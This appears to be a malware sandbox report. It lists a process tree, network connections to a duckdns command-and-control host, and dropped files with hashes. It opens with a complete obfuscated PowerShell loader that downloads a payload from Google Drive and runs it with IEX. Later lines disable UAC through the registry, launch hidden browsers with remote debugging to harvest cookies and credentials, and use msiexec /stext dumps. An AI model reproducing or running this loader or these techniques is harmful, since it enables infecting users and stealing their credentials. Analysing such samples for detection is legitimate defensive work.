"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Sybotic Fladorme Ribbefri Sawpit #><#Twangling Heltidsbeskftigendes Underkaste Ejerstrukturen undladelsessynders Shufty #>$Saltekarrene='reflip';function Yoick($Glyphs){If ($host.DebuggerEnabled) {$Sekteriker++;$Sithement=$Glyphs.'Length' - $Sekteriker} for ( $swiveling=4;$swiveling -lt $Sithement;$swiveling+=5){$Rorke=$swiveling;$Reglers+=$Glyphs[$swiveling]}$Reglers}function Narrestregen($Beat){ .($projiceret) ($Beat)}$Konsumeringernes=Yoick ' awmnMis e Libt Sog.Asp WCande VagbTrk cThymLdemai SikEFin N ,ikt esk ';$Stilmblerne=Yoick 'AfstMBrano DepzF reiFr nlSemil unka .kt/Demn ';$Tsiology=Yoick 'C emTStanl SolsMyel1Nodd2A gr ';$Kontraktioners='Trop[ TruNOldfE istTgen .Cy rS BlaEZar rOpegvSysti itcCE.soeSynsPSypioI iti mpeNbndeTgregMFejla Vikn artADa rGVkkee Aflrslat]Olie:E tr:In eS Slae ammcTil.UFelwrTar IprovT StaySnylpBattRRoseoStafTMarioAut CTr kO ramlDisk=,usp$tar TU,diSHy,rIRui oB hrL nteo .msg N.nYTalo ';$Stilmblerne+=Yoick 'Majo5 Bar. Reg0 Com Ins( orWOrdiiPartn etedBredoCarow upesUncr GrapNFresTShun .rim1 Pe,0Wayl.sko 0Nazi; nte TelW GuriPalenrung6Lvfa4Vago; Rem Ihsx usp6Work4Sags; eca RedrrUn qv ver: ig1sire3 ou 1S it.Udle0 ros) Hje nbuGLoreeElekcunfaksk toUne /supe2Sulp0Pulm1L.uc0 S.u0 Kim1s,is0 Den1Glut BrneFa,paiMinorInteeSkolfPanlo C,pxBayr/Vift1 erf3Soft1Comp.tric0Hove ';$Bedazement=Yoick 'Ski,US alsGammEParkrJean-Re kaTaoiG BageUnpon eciTNrre ';$Amoralitetens112=Yoick ' hi.hAtomtShartB ugpNikksKltr:Tr.q/forg/Yok,d ritrScati MorvAfgreDeba.Sl mgKrusoBankoResigAdral Cr,eNonv.aflyc OpfoEftemBein/Justu LsecRac ?Fad e.hrexbiblpGrino ommrSocitGnav=Snond Oato IndwBetenHyb l UnpoBracaD tadSvrm&ParliKnopdBehn=Cant1 husGmanaY op V UklwE brA De ZbrevePol _ Nask Mav3IndsHrecoh Fu X H.soHynet Lov-TilfX.ikkTTffeFAntiVUdspa JulaCoulE.usch Va 9 LeaUS reUUninqVrdii.aryJ.idrHGablY tox ';$Vulvocrural=Yoick 'Bye >Exta ';$projiceret=Yoick 'IrroI SolEUdgaXS od ';$Spanierne='betydningslren';$swivelingnsipient='\Borgerrettighed.Pol';Narrestregen (Yoick 'Alky$TilkG RadLTr kO L.pbDataABushlSt l:TorrmBortYnormO de pPreerBarrOhalvTBirte C liM.sonSurg=oppu$Nun eR dunBobrVBlas:CoadasdumPNumep uledtmmeACroqTSte a ,nd+Bram$BallSsi.kW.icriIntevPulwENdr lLup IEatan AdvgOpern SskST,wei engPTidsIBi,teUnbuN Afnta is ');Narrestregen (Yoick ' Cha$ MargBag Lt stoMaribMercAStilL B,d:For.SHor.aFr,eLUlt gAr esL,vicShimHMo,ea Sp uM.ndFTankFSarkrPlir5upca3Izaf=.one$ArmeaPendMTtnioCarbrH arALng lS rdiRiddt.onfETrutT RecEMetrNTr.msEndt1Pala1Poly2Evil.IrresMo op Un lLirkIEchotFeml(Syst$UdskVNaa uN,npl icvImbuO.pstCDwarrkonsu FasrD.avABekrlhawa),ord ');Narrestregen (Yoick $Kontraktioners);$Amoralitetens112=$Salgschauffr53[0];$Skandale130=(Yoick 'Co,n$dio gibinlCykeODoteB DedAK plL ,em:giolSUfo k ProiAnaxLPer L Hume unVUddegskrmSSelvfTablLBefiyHaantFortnAffai Po ND.aegOligSA le=AvlenLegae.arnwprea-StrioGastbAlitjVandE Ai cBoliT Try BesS CuryAcmaSAnveTUhareUnmem Aft.bogs$PuiskLataOThewN kaSbygguOphom Al E rchRUd eICur NNonaGAarmeTrearde,aNWildeLvsaSpreo ');Narrestregen ($Skandale130);Narrestregen (Yoick 'Lisc$ SveS GrukHe.iiIn alGstel NoneAff vLym gTingsDem fSkrilPi.ayForstBesknB,ggiApornaagegjungsA ie.WielH ArveCapraAjledAbnoeMaskrOpbysMoon[Fe.h$ nteBMor.eT akdVulcaDevozV lgeF rlmdk ieCo sn.ecttnar ]Usn = Pyr$PangSBenetAffei ndsl,nfrm Moob tillEftee BogrSlvknKulle Br ');$Paramastigate=Yoick 'Snyd$PostSDetekS.bciDepalRe sl CiteOvervPr,vgDe,es JowfG rdlJoggyJ but ParnJageiRenunResigUni sUn a.T.enD.ynooVentwSulfnUndelUlovo GuaahunddPortFSor.iTherlsagteR.ms(Chon$El cA intm ovso arir nstaEksplSk.giUgant UnceDr ftSnedeSammn .eys Ra.1Styr1,arg2,lbe, Scr$Fo lJ StruEnt mLnfobAutol tile,jord Rek4 ebr1Sild)Udsk ';$Jumbled41=$Myoprotein;Narrestregen (Yoick 'R,su$Om,gGS,vsL aaOEpigB GalASymbL Slu: P tVHalsrRab I GamGPelt= Bla(ForsT Re eR,nmSSapoTOver-BaklPMidnaMisltAmbiHOp f Macr$Ol gJS avUForkmu.soBIndtL idE PreDH,ar4 Baj1 Cni) ver ');while (!$vrig) {Narrestregen (Yoick 'C,ar$KopigGy,nl Fiso Gi bAstea Ve,l Dea:Ban A TjabTravs renvMaglo MislL,antmin =Thor$Anubtnon r eruAutoe,las ') ;Narrestregen $Paramastigate;Narrestregen (Yoick ',illsGeneTAkhla IntRMisitCyto- bersGeofLarreePho eFor.PBr.s Stam4Midd ');Narrestregen (Yoick 'Spe $ nfuGOu dlMornoPreoBIm aa CyklHomm: IsbvScenrVerdiFascg,ens=Gest( DektCo.pEneigSLamptpigg-GoutPm.isATeleT.rbah ,uk Redi$ FrujPol.uvalgmBon BFi eL DiveOverdTi g4Cons1Elec) Pr ') ;Narrestregen (Yoick ' Phr$ SevgFodbl,agtoSnakbUde ABrnelNatt:Rou mImboORollDS,amu Zanl .reAP otTLandIMurrOTaroNBu h=.dvi$ ArsGSweeL Ku.OUnrub XreaOmkrlGall:FortD ndeEBrempalc.H PlaLN,diO,uliG OveITandS lot inniTittc soma omnT MusEmilj+Vedf+Patr%Tidm$ParaS Ch aBo.tlKikkGRedasTykscI.teh ndeA MaiUcataFPo sfVagor ig5 ont3Drif.m,lmCLiceoBeviUIntenGerbtFor ') ;$Amoralitetens112=$Salgschauffr53[$Modulation]}$Hvervenes=280926;$Korrespondens=30345;Narrestregen (Yoick '.amu$IberG .nfLUdenoLevebReasAfierLNaes:UnplFEquaoTarpRparaTJereROutbnThunElapnL Stes SvieRundRBldg Marv= M s ConfGantie UnstLebe- EyeC oleo TubnKnigTCan eMa znFor tDhan Prop$RuneJWateUmundM ekaBBruglRem.eNe eD.eho4Me a1Tryk ');Narrestregen (Yoick 'Reli$NonegRep lOranoMantbfaxeaReaslSoli:HoveKRegloWeisgDriva Ce lUndvsProskMoonaProbb ,etsTegn und =Ubev Pers[ Ve SmiscyCym sForstReocePaenm and.LambC WanoUndenAnalvHusleVibrr UnrtProg]mask:Dewb:KlieFJaycrDecaoSkjomSt nBLi eaPerss Xyle Lon6El e4Co.uSStoltInelroveri Snun AdvgIndt(Ante$A,owfMytoo plarSpeetRea.rForenP treReallPhocsJi se blorKoka)Micr ');Narrestregen (Yoick ' .un$ImmuG raLGgetoHy.rBOmbuA Vr l est: Oves T do Pe nUndegPosisSamkT ElaRImpreBranSSkibsSupeeU baS ao1 Ep 6B ff5Hamm Kr k=Lind Para[VrdisRelaYRe.asSeruTUrinEAfspmSty..DititAntiE ,ncxza iT ,ae.TherE ycanBereCFrgeoS uddDecriBe yn TeaGAnbe]Legi:Zina:Be.yA RaaS l.uCCellIS eei Sut.RoseGLaudeStrmtLrerSBaryT SamRS.kuIforfNOverGObse(Gen,$U.isKChecOUroegExpuA yralOrk S VenkA,anASpigB Carsno i) hir ');Narrestregen (Yoick 'Ophr$LitagMultLNomioSledbKubiAc urLColu: Ge mAnt eActiSOto,sErikeJupiNTrus= Fly$Spr SNiseOPer NDenaGUhanSBladtFuldRFl ve.ebisAf vSChinE SlysOutb1St r6,eni5s ba. ifns HeduStowBBjrnS RoutJulerInfoI BlonAutoG Res( V d$ andH alaVPdqae.ollRRapsVB llEA,niNm,gneDe esSkra,Une $Ri pkKle OAtomrHumiRNonfED.mmS EndPKommo.vern SkrdNordEbarnnAn,iSU,ti)Pycn ');Narrestregen $Messen;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Program Files\Google\Chrome\Application\Chrome.exe
--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa39fbcc40,0x7ffa39fbcc4c,0x7ffa39fbcc58
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\euyomxdaaormfgjg"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pwdgnpncowjzhvfkrmd"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pwdgnpncowjzhvfkrmd"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\zqjzohyvkebesbtoaxpegvp"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2072,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:2
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1960,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:3
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2432 /prefetch:8
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3156 /prefetch:1
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4176,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4652 /prefetch:1
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4748,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4772 /prefetch:8
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4892,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4764 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa39e746f8,0x7ffa39e74708,0x7ffa39e74718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.187.227:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | dvlqrd8dhs.duckdns.org | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 154.216.20.245:46063 | dvlqrd8dhs.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 154.216.20.245:46063 | dvlqrd8dhs.duckdns.org | tcp |
| US | 154.216.20.245:46063 | dvlqrd8dhs.duckdns.org | tcp |
| US | 154.216.20.245:46063 | dvlqrd8dhs.duckdns.org | tcp |
| US | 8.8.8.8:53 | 245.20.216.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.212.202:443 | ogads-pa.googleapis.com | tcp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 216.58.212.202:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| N/A | 127.0.0.1:9222 | tcp | |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
memory/964-4-0x00007FFA391D3000-0x00007FFA391D5000-memory.dmp
memory/964-5-0x0000019275F30000-0x0000019275F52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cgj1eocl.qbq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/964-15-0x00007FFA391D0000-0x00007FFA39C91000-memory.dmp
memory/964-16-0x00007FFA391D0000-0x00007FFA39C91000-memory.dmp
memory/964-18-0x00007FFA391D3000-0x00007FFA391D5000-memory.dmp
memory/964-19-0x00007FFA391D0000-0x00007FFA39C91000-memory.dmp
memory/964-21-0x00007FFA391D0000-0x00007FFA39C91000-memory.dmp
memory/964-24-0x00007FFA391D0000-0x00007FFA39C91000-memory.dmp
memory/536-25-0x0000000004F60000-0x0000000004F96000-memory.dmp
memory/536-26-0x0000000005730000-0x0000000005D58000-memory.dmp
memory/536-27-0x0000000005570000-0x0000000005592000-memory.dmp
memory/536-28-0x0000000005610000-0x0000000005676000-memory.dmp
memory/536-29-0x0000000005E10000-0x0000000005E76000-memory.dmp
memory/536-39-0x0000000005F80000-0x00000000062D4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2d74f3420d97c3324b6032942f3a9fa7 |
| SHA1 | 95af9f165ffc370c5d654a39d959a8c4231122b9 |
| SHA256 | 8937b96201864340f7fae727ff0339d0da2ad23c822774ff8ff25afa2ae4da3d |
| SHA512 | 3c3d2ae3b2581ff32cfee2aedca706e4eaa111a1f9baeb9f022762f7ef2dfb6734938c39eb17974873ad01a4760889e81a7b45d7ed404eb5830f73eb23737f1a |
memory/536-41-0x0000000006520000-0x000000000653E000-memory.dmp
memory/536-42-0x0000000006570000-0x00000000065BC000-memory.dmp
memory/536-43-0x0000000007D80000-0x00000000083FA000-memory.dmp
memory/536-44-0x0000000006AE0000-0x0000000006AFA000-memory.dmp
memory/536-45-0x00000000077A0000-0x0000000007836000-memory.dmp
memory/536-46-0x0000000007740000-0x0000000007762000-memory.dmp
memory/536-47-0x00000000089B0000-0x0000000008F54000-memory.dmp
C:\Users\Admin\AppData\Roaming\Borgerrettighed.Pol
| MD5 | 151088b8801ce6d8e7d768186846b8fb |
| SHA1 | d83dcf54fb5da27a4f0223722bd1d4ceb29eebc6 |
| SHA256 | d96005febe8ec22af04cc0e3f8997d59e46decbdc87885b3a3a085baeb26febe |
| SHA512 | 4a9255b3439225a919c512b355e6646195c30e22bdcc7f9512d73bb915ff97c44246fa1e93719e3d283515fd383ff72d753cf0ce16c26a78646147510a46ceed |
memory/536-49-0x0000000008F60000-0x000000000A4AC000-memory.dmp
memory/2024-62-0x0000000001000000-0x0000000002254000-memory.dmp
memory/2024-63-0x0000000001000000-0x0000000002254000-memory.dmp
memory/2024-67-0x000000001F680000-0x000000001F6B4000-memory.dmp
memory/2024-70-0x000000001F680000-0x000000001F6B4000-memory.dmp
memory/2024-71-0x000000001F680000-0x000000001F6B4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State
| MD5 | 7daacfb1893083397ae4baf6b0e96d27 |
| SHA1 | d96add6847097d7c933081a4381ec80409879339 |
| SHA256 | 6b7ed34ae75a2937acd76242b26f9d6fda9aa75a9a43379bf638079f3a0cb778 |
| SHA512 | f5cb2ff8baf149787dab2777945a67f016aa410bcb88d3065a7f7ca4c3b689e56410d56d43bba90afab40fcf161dfc4506885662f77494f1ce0d45e7f989e4f5 |
memory/2524-80-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2524-83-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2524-86-0x0000000000400000-0x0000000000478000-memory.dmp
memory/4664-94-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4664-93-0x0000000000400000-0x0000000000424000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies
| MD5 | ee283aec39f062fb5b04d8cd640b20d9 |
| SHA1 | fa0138102e77c66c01ef6c39c21f6191e1fad4ea |
| SHA256 | 27b9348d313f1f4c266a5237153a824005630d2daf6270423833775190d1f84d |
| SHA512 | 72c07679cc5bdc8e95682b76e8c2a74d2d899e15ceebbc3cd61c59fe2b1eb198e947923dfecacec21c7d36855cc78e064304e4ad578bc7f0503f9f1b412f1ed3 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences
| MD5 | 201fa205707c48fcee92326e5894e567 |
| SHA1 | ada346a5ef114e5a831563ace50c6650667b23f7 |
| SHA256 | f122d839832c9b9f4feed61b2f5d5f1165d8f29a5563580fe6af3550113aa959 |
| SHA512 | 48701c66064274e0d0e62c190fb12fce104ddb795006662318c6560a956d7444ec3c81e6149a04c48ae7007cea6458d7da1fd6ab37130c2763fd88210f957242 |
\??\pipe\crashpad_1868_RIRXEZIZCDXUTLIC
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/4664-88-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1416-84-0x0000000000400000-0x0000000000462000-memory.dmp
memory/1416-87-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2524-81-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1416-85-0x0000000000400000-0x0000000000462000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000001.dbtmp
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GrShaderCache\data_3
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GrShaderCache\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
